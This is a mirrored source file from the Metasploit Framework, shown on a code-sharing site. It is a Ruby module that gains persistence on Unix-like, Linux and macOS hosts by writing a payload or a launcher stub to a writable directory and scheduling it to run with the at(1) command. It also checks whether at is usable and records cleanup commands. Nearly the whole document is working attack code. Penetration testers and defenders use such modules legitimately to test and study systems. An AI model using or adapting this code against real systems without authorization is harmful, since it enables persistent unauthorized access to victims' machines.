Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/persistence/at.rb
31999 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Exploit::FileDropper

11
  include Msf::Exploit::EXE # for generate_payload_exe

12
  include Msf::Exploit::Local::Persistence

13
  include Msf::Exploit::Local::Timespec

14
  prepend Msf::Exploit::Remote::AutoCheck

15
  include Msf::Exploit::Deprecated

16
  moved_from 'exploits/unix/local/at_persistence'

17


18
  def initialize(info = {})

19
    super(

20
      update_info(

21
        info,

22
        'Name' => 'at(1) Persistence',

23
        'Description' => %q{

24
          This module executes a metasploit payload utilizing at(1) to execute jobs at a specific time.  It should work out of the box

25
          with any UNIX-like operating system with atd running.

26
          Verified on Kali linux and OSX 13.7.4

27
        },

28
        'License' => MSF_LICENSE,

29
        'Author' => [

30
          'Jon Hart <[email protected]>'

31
        ],

32
        'Targets' => [['Automatic', {} ]],

33
        'DefaultTarget' => 0,

34
        'Platform' => %w[unix linux osx],

35
        'Arch' => [

36
          ARCH_CMD,

37
          ARCH_X86,

38
          ARCH_X64,

39
          ARCH_ARMLE,

40
          ARCH_AARCH64,

41
          ARCH_PPC,

42
          ARCH_MIPSLE,

43
          ARCH_MIPSBE

44
        ],

45
        'SessionTypes' => ['meterpreter', 'shell'],

46
        'DisclosureDate' => '1997-01-01', # http://pubs.opengroup.org/onlinepubs/007908799/xcu/at.html

47
        'References' => [

48
          ['URL', 'https://linux.die.net/man/1/at'],

49
          ['URL', 'https://www.geeksforgeeks.org/at-command-in-linux-with-examples/'],

50
          ['ATT&CK', Mitre::Attack::Technique::T1053_002_AT],

51
          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],

52
          ['ATT&CK', Mitre::Attack::Technique::T1053_001_AT_LINUX],

53
        ],

54
        'Notes' => {

55
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],

56
          'Stability' => [CRASH_SAFE],

57
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]

58
        }

59
      )

60
    )

61


62
    register_options([

63
      OptString.new('TIME', [false, 'When to run job via at(1). See timespec', 'now']),

64
      OptString.new('PAYLOAD_NAME', [false, 'Name of the payload file to write']),

65
    ])

66
  end

67


68
  def check

69
    return CheckCode::Safe("#{datastore['WritableDir']} does not exist") unless exists? datastore['WritableDir']

70
    return CheckCode::Safe("#{datastore['WritableDir']} not writable") unless writable? datastore['WritableDir']

71


72
    return CheckCode::Safe('at(1) not found on system') unless command_exists? 'at'

73


74
    # we do a direct test with atq instead of reading at.allow and at.deny

75
    token = Rex::Text.rand_text_alphanumeric(8)

76
    if cmd_exec("atq && echo #{token}").include?(token)

77
      return CheckCode::Vulnerable('at(1) confirmed to be usable as a persistence mechanism')

78
    end

79


80
    CheckCode::Safe('at(1) not usable as a persistence mechanism likely due to explicit permissions in at.allow or at.deny')

81
  end

82


83
  def install_persistence

84
    fail_with(Failure::BadConfig, "TIME option isn't valid timespec") unless Msf::Exploit::Local::Timespec.valid_timespec?(datastore['TIME'])

85
    payload_path = datastore['WritableDir']

86
    payload_path = payload_path.end_with?('/') ? payload_path : "#{payload_path}/"

87
    payload_name = datastore['PAYLOAD_NAME'] || rand_text_alphanumeric(5..10)

88
    payload_path << payload_name

89
    vprint_status("Writing payload to #{payload_path}")

90


91
    if payload.arch.first == 'cmd'

92
      upload_and_chmodx(payload_path, payload.encoded)

93
    else

94
      # because the payloads contents is imported into the at job, we use a stub to call our payload

95
      # as it doesn't like binary payloads directly

96
      payload_path_exe = "#{payload_path}#{rand_text_alphanumeric(1..2)}"

97
      # stub, but keep payload_path name for consistency

98
      upload_and_chmodx(payload_path, "#!/bin/sh\n#{payload_path_exe} &\n")

99
      upload_and_chmodx(payload_path_exe, generate_payload_exe)

100
      @clean_up_rc << "rm #{payload_path_exe}\n"

101
    end

102


103
    @clean_up_rc << "rm #{payload_path}\n"

104


105
    job = cmd_exec("at -f #{payload_path} #{datastore['TIME']}")

106
    job_id = job.split(' ')[1]

107
    print_good("at job created with id: #{job_id}")

108
    # this won't actually do anything since its not in a shell

109
    @clean_up_rc << "atrm #{job_id}\n"

110


111
    print_status("Waiting up to #{datastore['WfsDelay']}sec for execution")

112
  end

113
end

114


115